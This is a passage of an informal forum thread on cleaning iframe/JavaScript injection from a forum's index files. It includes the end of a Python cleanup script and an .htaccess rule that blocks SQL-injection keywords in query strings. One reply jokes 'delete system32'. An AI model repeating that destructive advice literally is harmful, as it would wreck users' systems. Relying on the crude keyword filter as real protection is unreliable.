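            print("cleaned" if backup else "infected", path, ", ".join(findings))
        for path in htaccess:
            print("review by hand", path)
```

Point the backup directory outside the web root so the saved infected copies are never served. `.htaccess` files are only listed, since the thread does not show what an altered one looks like.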
 
Replacing is not an option if he installed mods. In IPB 2 you still had to do file edits so replacing is most likely a no go. Besides NP++ can remove all 4 strings in less than 10 minutes.
 
No it wouldn't since only his index files are infected. I'm quite familiar with the technique being used here. There is no need to replace the other files.

Edit: whoops, missed the edit button :(.
 
Clean your files or upload clean files and use the following lines in your .htaccess file for further prevention of iframe/JavaScript injection.

Code:
RewriteCond %{QUERY_STRING} ^.*(;|<|>|'|"|\)|%0A|%0D|%22|%27|%3C|%3E|%00).*(/\*|union|select|insert|cast|set|declare|drop|update|md5|benchmark).* [NC]
RewriteRule .* - [F]
 
I had the same problem a few days ago

http://www.wjunction.com/showthread.php?t=8979

This is because of an infection on your PC.
Scan your PC thoroughly.
Change your cPanel password. Keep changing the cPanel password after each FTP session.
Now install a fresh script.

It should solve your problem.

Yes, I agree with you. I told him through MSN; he will do it ASAP. I also faced this problem 2 months ago, and I said whatever you said and also gave the iframe prevention code to put in .htaccess.

Don't you have a backup? Just replace and then you will be sure the virus lines are not in other files you haven't seen.

No, if he restores his backup it will happen again because his PC is infected, and he does not agree to format it because he has important data on his C drive. So there is one thing he needs to do: scan his PC and use cPanel, not FTP software.
 
Yeah. I think I got infected by one when I was using NOD32 on Windoze a few weeks ago. Those types of iframe attacks are nasty.

I've also had a few clients who had problems with these. They'd get infected then the virus would log any ftp connection then edit the index files and inject malicious code to spread.

Avira Premium Security Suite is good for blocking these types of attacks. Although getting new trial licenses is a bitch it's worth it. Or delete system32 and install linux.
 